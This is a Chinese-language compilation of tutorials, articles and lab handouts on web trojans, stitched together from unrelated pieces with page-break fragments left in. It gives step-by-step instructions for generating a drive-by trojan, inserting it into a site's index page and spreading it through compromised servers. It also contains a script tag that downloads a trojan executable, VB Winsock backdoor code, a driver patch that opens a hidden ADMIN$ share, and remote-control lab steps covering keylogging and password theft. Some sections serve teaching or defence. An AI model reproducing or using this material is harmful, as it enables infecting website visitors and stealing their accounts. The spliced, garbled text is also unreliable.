网页木马制作全过程(详细)

asp编写网页木马的方法
欢迎大家在这里学习asp编写网页木马!这里是我们给大家整理出来的精彩内容。

我相信，这些问题也肯定是很多朋友在关心的，所以我就给大家谈谈这个!我们经常听到这样的忠告：不要随意下在不明的程序，不要随意打开邮件的附件...这样的忠告确实是有用的，不过我们的系统有不少漏洞，许多木马已经不需要客户端和服务端了，他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能，有的木马会在你完全不知道的情况下潜入，现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子，也就是网页木马.
 首先我们需要编写几个简单的文件
 一。

名字为abc.abc的文件
 其中test.exe为木马程序，实现必须放在WEB发布的目录下，文件abc.abc 也必须保存在发布的目录下。

 二。

名字为test.htm的文件
 木马运行测试!(这句话可以改成你想说的)
 三。

名字为win.test的文件。

---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一，在 2008 年到2010 年间，网页挂马攻击更是成为了黑客最主要的攻击手段。

根据瑞星云安全系统监测， 2008 年到 2010 年间，客户端受到恶意网马的年攻击次数达到千万级别。

虽然近两年来，网络钓鱼攻击已经在数量上超越了网页挂马攻击，但是网页挂马攻击所带来的危害依然巨大，不仅对网站的安全运行造成威胁，对客户端用户来说，网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。

常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后，在网站的页面中插入一些代码，当浏览者访问到这些包含有恶意代码的网页时，就会在不知不觉中执行相应的漏洞利用程序。

这些程序可以在浏览者的电脑上下载并执行木马程序，导致浏览者的电脑成为黑客的肉鸡。

挂马操作可以有多种方式实现，以下是比较常见的几种挂马攻击手段。

1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架，在访问网页时，从网页表面是无法通过肉眼看到这个框架的，只能通过网页源码分析或抓包的方式查看到相应的数据信息。

1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中，同时恶意篡改网站文件中的 JS 文件代。

一般来讲，那些被全站引用的 JS 代码最容易被黑客挂马。

3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理，黑客通过加密代码的方式隐藏了该信息。

4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的，当用户访问挂有以上代码的网页时，页面就会自动跳转去执行黑客指定的恶意页面，从而导致挂在恶意页面的木马在本地被执行。

网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件，如果网站存在SQL注入漏洞，则比较容易取得一定的权限。

如果在服务器上对网站目录等做了较严格的权限限制，也是比较容易取得Webshell权限，具有Webshell权限可以对网页文件进行修改，而挂马就是在网页中加入一些代码。

这些代码往往是利用浏览器或者应用程序的漏洞，浏览者在访问这些网页时，往往会在不知不觉中去下载一些木马程序来执行。

网站挂马的原理就是设置框架网页的宽度和高度为0，将一些恶意网页隐藏起来，用户访问网站时不容易觉察。

目前在网络上有很多网页木马生成器，简称“网马生成器”，本案例以“Ms-0733网马生成器”为例，来讲解如何进行网站挂马攻击。

步骤一配置网页木马。

在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端，然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”，如图1所示，然后单击“生成木马”即可生成一网页文件HACKLL.HTM。

配置Ms-0733网马生成器步骤二修改网站网页文件。

在网站首页文件index.asp中加入已经配置好的网页木马htm文件，一般通过在页面中加入“”来实现，如图2所示。

加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞，其网页木马最本质的东西有两个一个是脚本，另外一个是真正的木马服务端，利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。

其网页木马文件中多是一些JavaScript代码，如图3所示。

网页木马源代码测试网页木马是否能够正常执行。

在未安装微软的MS0933补丁程序的虚拟机中打开浏览器，并在其中输入网页木马的地址，一会儿后，在控制端就看见肉鸡上线了。

大量传播网页木马。

网页木马测试成功以后，就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上，只要访问者的系统未安装其网页木马利用的漏洞，如果系统未安装任何对网页木马进行防御的软件，则计算机感染网页木马的几率非常大。

木马的工作原理
木马是一种恶意软件，通过欺骗或者胁迫方式侵入电脑系统，并在背后执行不被用户知晓的操作。

木马的工作原理可以描述为以下几个步骤：
1. 渗透：木马首先要渗透到受害者的电脑系统中。

这可以通过诱骗用户点击恶意链接、下载感染文件、插入感染的移动存储设备等方式实现。

2. 安装：一旦成功渗透，木马会开始安装自己到受害者电脑系统中，通常是将木马隐藏在合法的程序或文件中，来避免受到用户的怀疑。

3. 打开后门：安装完成后，木马会打开一个后门，以便攻击者可以远程操作受感染的电脑。

通过这个后门，攻击者可以执行各种恶意操作，比如窃取敏感个人信息、操控计算机、启动其他恶意软件等。

4. 隐蔽行动：为了不被用户察觉，木马会尽可能隐藏自己的存在。

这可以包括隐藏进程、修改注册表、关闭安全软件和防护机制等操作。

5. 通信与命令控制：木马通常会与控制服务器建立连接，通过命令控制来获取指令、向攻击者报告信息以及接收新的命令和更新。

6. 恶意行为：木马还可以执行各种其他恶意行为，比如窃取账
户密码、传播自身到其他系统、发起拒绝服务攻击等。

总之，木马的工作原理是通过欺骗和操控来在电脑系统中埋下后门，并获取对目标系统的控制权限，以实现攻击者的目的。

用户需要保持警惕，避免点击可疑链接、下载非信任来源的文件，以及定期更新和使用安全软件来防护自己的电脑。

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

木马程序已经并不是十分高明的技术了，它们不外乎也就是基于TCP／IP协议的客户端／服务端程序。

工作原理:普通的客户端／服务端软件一样，只不过它们隐藏得比较好，不容易发现而已。

首先对你怀有野心的人利用现成的操作系统或是某些软件本身的漏洞想方设法的把服务端程序加到你的本机上运行，然后通过客户端向你本机中的服务端程序发出一些请求，最后对你本机进行操作，完成他们想要达到的目的。

步骤:首先，新建一工程，名为Server，新建一个窗体，Name为frmServer，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCP／IP协议。

接下来我们回来frmServer窗体模块中，添加如下代码：Private Sub FORM_Load()With Me.sckServer.LocalPort = 4000‘本地端口.sckServer.Listen ‘开始监听End WithEnd Sub‘接受客户端的连接请求。

Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)With MeIf .sckServer.State <>sckClosed Then .sckServer.Close.sckServer.Accept (requestID)End WithEnd Sub下面我们来建立客户端程序：新建一个工程，名为Client，把窗体名为frmClient，在上面加入一个winsock控件，名为sckClient，协议为TCP／IP协议。

再加一个按钮cmdConnect在窗体模块中加入代码：Private Sub FORM_Load()With Me.sckClient.RemoteHost = "127.0.0.1"‘设置远程IP，本例设为本机。

.sckClient.RemotePort = 4000 ‘远程端口,就为server中的设置一样.End WithEnd SubPrivate sub cmdConnect_Click()SckClient.ConnectEnd sub至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print “Connetion successful!”来查看。

⽹络安全实验六：1.⽊马攻击实验步骤⼀：冰河⽊马植⼊与控制分别进⼊虚拟机中PC1与PC2系统。

在PC1中安装服务器端（被攻击者），在PC2中安装客户端（发起攻击者）。

（1）服务器端：打开C:\tool\“⽊马攻击实验“⽂件夹，双击G_SERVER。

因为虚拟机防⽕墙已关闭故不会弹窗，双击即为运⾏成功，⾄此，⽊马的服务器端开始启动（2）客户端：切换到PC2，打开C:\tool\“⽊马攻击实验”⽂件夹，在“冰河”⽂件存储⽬录下，双击G_CLIENT。

双击后未弹窗原因同上，出现如下图所⽰（3）添加主机①查询PC1的ip地址，打开cmd，输⼊ipconfig，如下图，得知IP地址为10.1.1.92②添加PC1主机：切换回PC2，点击如下图所⽰输⼊PC1的ip地址10.1.1.92，端⼝默认7626，点击确定若连接成功，则会显⽰服务器端主机上的盘符，如下图⾄此，我们就可以像操作⾃⼰的电脑⼀样操作远程⽬标电脑.步骤⼆：命令控制台命令的使⽤⽅法（1）⼝令类命令：点击“命令控制台”，然后点击“⼝令类命令”前⾯的“+”即可图界⾯出现如下图所⽰⼝令类命令。

各分⽀含义如下：“系统信息及⼝令”：可以查看远程主机的系统信息，开机⼝令，缓存⼝令等。

可看到⾮常详细的远程主机信息，这就⽆异于远程主机彻底暴露在攻击者⾯前“历史⼝令”：可以查看远程主机以往使⽤的⼝令“击键记录”：启动键盘记录后，可以记录远程主机⽤户击键记录，⼀次可以分析出远程主机的各种账号和⼝令或各种秘密信息（2）控制类命令点击“命令控制台”，点击“控制类命令”前⾯的“+”即可显⽰图所⽰界⾯如下图所⽰控制类命令。

（以”发送信息“为例，发送”nihaoya“）此时切换回PC1查看是否收到信息，如下图⾄此，发送信息功能得到验证各分⽀含义如下：“捕获屏幕”：这个功能可以使控制端使⽤者查看远程主机的屏幕，好像远程主机就在⾃⼰⾯前⼀样，这样更有利于窃取各种信息，单击“查看屏幕”按钮，然后就染成了远程主机的屏幕。

教你做木马网上木马程序很流行，其实说来也很简单，大致都是修改注册表或者INI文件加载一个文件提供服务，这就手工都很容易检测出木马来。

一，看增加的不明服务。

二，因为木马是作为服务一般要打开一个网络通信端口，所以检查增加的服务端口也很容易检查出木马程序来。

其实完全可以稍微改动操作系统内核而作出一个很好的木马来，这样不用改动注册表也可以让用户很不容易发觉。

下面就是简单改动一个驱动程序做一个木马的方法。

大家可以分析别的驱动程序相应的作出自己的木马来。

这儿是利用WINDOWS的共享和远程管理。

WINDOWS的共享如果共享名是ADMIN$就可以远程管理，就是登陆ADMIN$进去了后所有的盘都完全共享为盘符加$.下面一段就是VSERVER。

VXD处理共享的一段程序，SUB_0027校验密码，密码对了后后面检测共享名是ADMIN $否,是就看C$,D$...共享没有（DATA_0431==0？)，没共享就调用SUB_0230共享，SUB_0230 一个参数就是密码指针，如果密码指针为0就没密码。

这儿为了好改动就用的这个参数。

显然我们就可以必要的时候调用SUB_0230 就开了个后门。

LOC_0415是检测网络通信的共享名串大于0DH否（包括串后的0），是就转LOC_0419出错返回，显然我们可以利用这儿去调用SUB_0230. 看LOC_0419 有7个字节可以利用，可以安排CALL SUB_0230NEW_LOC_0418 POP eaxjmp 03469刚好7个字节。

3436：JE LOC_0418 是没找到要共享的目录跳转到LOC_0418 显然要改动，改动成JE NEW_LOC_0418 就可以。

现在是LOC_0415一段要跳转到LOC_0419前要PUSH 0以调用SUB_0230。

下面是LOC_0415的改法：LOC_0415:03415 XOR EAX,EAX ;2 字节，同样SUB AL，AL 得到AL=0；还得到EAX=0。

木马编写培训教程随着互联网技术的不断发展，安全问题已经越来越受到人们的关注，而木马编写培训教程恰恰就是属于这一领域的培训之一。

在本文中，我将从什么是木马、常见的木马类型、如何编写木马以及如何保护电脑安全四个方面进行详细讲解，希望能对大家有所帮助。

一、什么是木马木马是一种潜伏在你电脑里的恶意软件，通常指通过某种方式，将恶意程序伪装成正常程序的一种攻击方式。

木马的特点是可以在用户不知情的情况下远程控制用户的电脑，进行各种病毒攻击、窃取机密数据等行为。

木马通常具有隐轰性、隐蔽性、攻击性等特点，不仅会给用户带来隐私泄露、个人信息被窃取等风险，同时也会对公司和组织的网络安全带来严重影响。

二、常见的木马类型1、后台木马后台木马通常是一个可执行的程序，它可以植入到用户电脑系统中，并在用户不知情的情况下运行，从而获取用户系统的控制权，从而将用户计算机作为一个“骇客”网网吧使用。

2、远程控制木马远程控制木马是由“骇客”直接控制用户计算机进行操作的木马，通常会植入到用户浏览器当中，可以隐蔽地控制用户的网页浏览，窃取用户的个人信息。

3、流氓软件流氓软件是一类利用欺骗用户的方式，装入计算机系统中并自动运行的程序。

它的主要特点是会将用户电脑当做自己的“管辖范围”，从而在用户不知情的情况下窃取用户的信用卡号、密码等隐私信息。

三、如何编写木马为了实现恶意行为，需要编写木马程序，本章主要介绍如何编写木马的基本流程。

1、确定木马攻击目标首先要明确自己所要攻击的目标，确定收集哪些数据、使用什么样的方式来攻击，以及攻击的时间场景等。

2、设计木马代码编写木马的核心代码，通过多种技术实现木马程序，如利用代码加密技术、利用虚拟机技术、肉鸡控制等技术。

3、测试木马程序将编写的木马程序进行测试，测试各种可能的情况是否都能正常运行。

四、如何保护电脑安全为保障自己的网络安全，需要采取一定的保护措施，比如：1、选择可靠的防病毒软件，及时更新病毒库，避免电脑感染病毒。

木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。

为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。

目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder （以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。

Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。

Socket最初是在Unix上出现的，后来微软将它引入了Windows 中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。

不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。

因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

实验三木马及远程控制技术练习一网页木马一、实验目的该实验为设计性实验。

✧剖析网页木马的工作原理✧理解木马的植入过程✧学会编写简单的网页木马脚本✧通过分析监控信息实现手动删除木马二、实验内容1.木马生成与植入2.利用木马实现远程控制3.木马的删除注：详细实验操作请参考实验室服务器上的参考资料。

三、实验步骤本练习主机A、B为一组，C、D为一组，E、F为一组。

实验角色说明如下：下面以主机A、B为例，说明实验步骤。

首先使用“快照X”恢复Windows系统环境。

（一）木马生成与植入在进行本实验步骤之前，我们再来阐述一下用户主机通过访问被“挂马”的网站而被植入木马的过程，便于同学们理解和完成实验。

（1）用户访问被“挂马”的网站主页。

（此网站是安全的）（2）“挂马”网站主页中的<iframe>代码链接一个网址（即一个网页木马），使用户主机自动访问网页木马。

（通过把<iframe>设置成不可见的，使用户无法察觉到这个过程）（3）网页木马在得到用户连接后，自动发送安装程序给用户。

（4）如果用户主机存在MS06014漏洞，则自动下载木马安装程序并在后台运行。

（5）木马安装成功后，木马服务端定时监测控制端是否存在，发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。

（6）客户端收到连接请求，建立连接。

1．生成网页木马（1）主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。

（2）主机A进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。

（3）主机A生成木马的“服务器程序”。

主机A单击木马操作界面工具栏“配置服务程序”按钮，弹出“服务器配置”对话框,单击“自动上线设置”属性页，在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址，在“保存路径”文本框中输入“D:\Work\IIS\Server_Setup.exe”，单击“生成服务器”按钮，生成木马“服务器程序”。

实验一脚本及恶意网页病毒实验一、实验目的通过实验了解脚本病毒的工作原理。

二、实验要求了解网页脚本病毒的基本概念，了解网页脚本病毒的工作流程。

三、实验原理1.网页病毒的工作过程如下：第一步:网页病毒大多由恶意代码、病毒体(通常是经过伪装成正常图片文件后缀的.exe文件)和脚本文件或JAVA小程序组成，病毒制作者将其写入网页源文件中。

第二步:用户浏览上述网页，病毒体和脚本文件以及正常的网页内容一起进入计算机的临时文件夹中。

第三步:脚本文件在显示网页内容的同时开始运行，要么直接运行恶意代码，要么直接执行病毒程序，要么将伪装的文件还原为.exe文件后再执行，执行任务包括:完成病毒入驻，修改注册表，嵌入系统进程，修改硬盘分区属性等。

第四步:网页病毒完成入侵，在系统重启后病毒体自我更名、复制、再伪装，接下来的破坏依病毒的性质正式开始。

2.网页脚本病毒的技术原理。

病毒形成的罪魁祸首就是WSH和Microsoft Internet Explorer漏洞。

WSH 架构于ActiveX 之上，是在Windows平台上独立于语言的脚本运行环境，可以实现Windows上的各种控制操作。

在网页中使用JAVASCRIPT、VBSCRIPT、ACTIVEX等网页脚本语言，结合WSH的功能，利用多种网络漏洞实现病毒代码的嵌入。

（1）IE的漏洞：错误的MIME（Multipurpose Internet Mail Extentions），多用途的网际邮件扩充协议头，Microsoft Internet Explorer浏览器弹出窗口，Object类型验证漏洞等。

（2）网页组件漏洞：JavaApplet、JavaScript、ActiveX等组件。

四．实验步骤(一).创建网页脚本病毒1．打开实验中要运行的脚本代码，如下图所示：2.打开创建网页的代码，如下所示:3.将其另存到桌面上为创建.HTML4.创建后在桌面上显示如下：5.双击运行创建.HTML文件，出现如下界面：6.单机允许组织内容，安全警告选择是，允许交互，结果如下所示：7.打开本地磁盘C盘显示运行创建.HTML产生的TEST.HTML，但是为0Kb.（二）网页脚本病毒拷贝实验1.打开拷贝代码，显示拷贝的内容是C盘下的TEST.HTML，并将其显示在桌面上。